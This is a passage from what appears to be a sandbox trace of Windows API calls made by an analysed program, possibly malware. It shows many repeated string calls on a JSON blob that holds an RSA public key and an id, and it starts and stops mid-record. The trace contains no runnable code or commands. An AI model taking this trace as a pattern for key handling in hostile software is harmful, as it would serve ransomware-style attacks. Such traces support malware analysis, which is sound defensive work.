KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.761] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0225.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d1fc8 | out: hHeap=0x630000) returned 1 [0225.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0225.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x448) returned 0x31c3648 [0225.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x989a778, cbMultiByte=-1, lpWideCharStr=0x31c3648, cchWideChar=548 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 548 [0225.761] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC 